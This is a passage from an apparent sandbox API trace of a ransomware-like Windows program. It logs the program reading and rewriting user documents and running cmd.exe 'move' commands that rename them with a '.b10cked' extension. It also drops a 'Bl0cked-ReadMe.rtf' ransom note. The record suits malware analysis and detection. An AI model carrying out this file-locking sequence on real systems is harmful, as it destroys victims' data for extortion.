lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.534] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0233.534] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.534] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x16db7 [0233.534] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.534] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.534] ReadFile (in: hFile=0x1b4, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xb6da, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xb6da, lpOverlapped=0x0) returned 1 [0233.535] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.535] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0xb6da, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0xb6da, lpOverlapped=0x0) returned 1 [0233.535] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-46810, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb6dd [0233.535] ReadFile (in: hFile=0x1b4, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xb6da, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xb6da, lpOverlapped=0x0) returned 1 [0233.536] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-46810, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb6dd [0233.536] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0xb6da, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0xb6da, lpOverlapped=0x0) returned 1 [0233.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="aK_FOd5jl.ots", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0233.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="aK_FOd5jl.ots", cchWideChar=13, lpMultiByteStr=0x131322c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aK_FOd5jl.ots", lpUsedDefaultChar=0x0) returned 13 [0233.540] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x16db7 [0233.540] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | 
out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0233.540] CloseHandle (hObject=0x1b4) returned 1 [0233.541] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\aK_FOd5jl.ots", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS") returned 0x2d [0233.542] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\") returned 0x21 [0233.542] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xdf0, dwThreadId=0xf24)) returned 1 [0233.543] CloseHandle (hObject=0x120) returned 1 [0233.543] CloseHandle (hObject=0x1b4) returned 1 [0233.543] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", cchLength=0x22 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\") returned 0x22 [0233.543] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", cchLength=0x48 | out: 
lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\") returned 0x48 [0233.543] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\", cchCount1=34, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\", cchCount2=72) returned 1 [0233.543] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", cchLength=0x22 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\") returned 0x22 [0233.543] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0233.544] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\", cchCount1=34, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0233.544] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0233.544] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0233.544] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0233.544] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\") returned 0x21 [0233.544] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0233.544] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0233.544] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xac8, dwThreadId=0xa94)) returned 1 [0233.545] CloseHandle (hObject=0x120) returned 1 [0233.545] CloseHandle (hObject=0x1b4) returned 1 [0233.546] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\bl0cked-readme.rtf")) returned 0x20 [0233.546] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0233.546] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0233.546] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0233.546] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.546] ReleaseMutex (hMutex=0xf8) returned 1 [0233.546] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.546] ReleaseMutex (hMutex=0xf8) returned 1 [0233.546] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.546] ReleaseMutex (hMutex=0xf8) returned 1 [0233.546] WaitForSingleObject (hHandle=0xf8, 
dwMilliseconds=0xffffffff) returned 0x0 [0233.546] ReleaseMutex (hMutex=0xf8) returned 1 [0233.546] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\mxjqisudxyxfeyxzgw.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0233.546] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.546] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14df4 [0233.546] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.546] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=29033560172) returned 1 [0233.546] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.546] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14df4 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14df4 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x14df4 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14df4 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14df4 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14df4 [0233.547] SetFilePointer (in: 
hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14df4 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14df4 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.547] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14df4 [0233.548] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.548] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x1490c [0233.548] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, 
lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0233.549] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0233.549] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.549] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x14df4 [0233.549] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.549] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0233.549] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.549] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x14df4 [0233.549] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.549] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.549] ReadFile (in: hFile=0x1b4, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xa6f9, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xa6f9, lpOverlapped=0x0) returned 1 [0233.549] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.549] 
WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0xa6f9, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0xa6f9, lpOverlapped=0x0) returned 1 [0233.550] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-42745, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa6fb [0233.550] ReadFile (in: hFile=0x1b4, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xa6f9, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xa6f9, lpOverlapped=0x0) returned 1 [0233.550] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-42745, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa6fb [0233.550] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0xa6f9, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0xa6f9, lpOverlapped=0x0) returned 1 [0233.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mXjqIsUDXYxFeYxzgw.ots", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0233.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mXjqIsUDXYxFeYxzgw.ots", cchWideChar=22, lpMultiByteStr=0x1328794, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mXjqIsUDXYxFeYxzgw.ots", lpUsedDefaultChar=0x0) returned 22 [0233.554] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x14df4 [0233.554] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 
1 [0233.554] CloseHandle (hObject=0x1b4) returned 1 [0233.555] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS") returned 0x2d [0233.555] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\") returned 0x21 [0233.556] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\MXJQIS~1.OTS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\mXjqIsUDXYxFeYxzgw.ots.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x9b0, dwThreadId=0x2ac)) returned 1 [0233.560] CloseHandle (hObject=0x120) returned 1 [0233.560] CloseHandle (hObject=0x1b4) returned 1 [0233.560] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", cchLength=0x22 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\") returned 0x22 [0233.560] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", cchLength=0x22 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\") returned 0x22 [0233.560] CompareStringW (Locale=0x400, dwCmpFlags=0x0, 
lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\", cchCount1=34, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\", cchCount2=34) returned 2 [0233.560] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.560] ReleaseMutex (hMutex=0xf8) returned 1 [0233.561] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.561] ReleaseMutex (hMutex=0xf8) returned 1 [0233.561] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.561] ReleaseMutex (hMutex=0xf8) returned 1 [0233.561] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.561] ReleaseMutex (hMutex=0xf8) returned 1 [0233.561] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\oR2F.csv" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\xj2fmd\\or2f.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x95cb [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.561] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=29035020609) returned 1 [0233.561] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 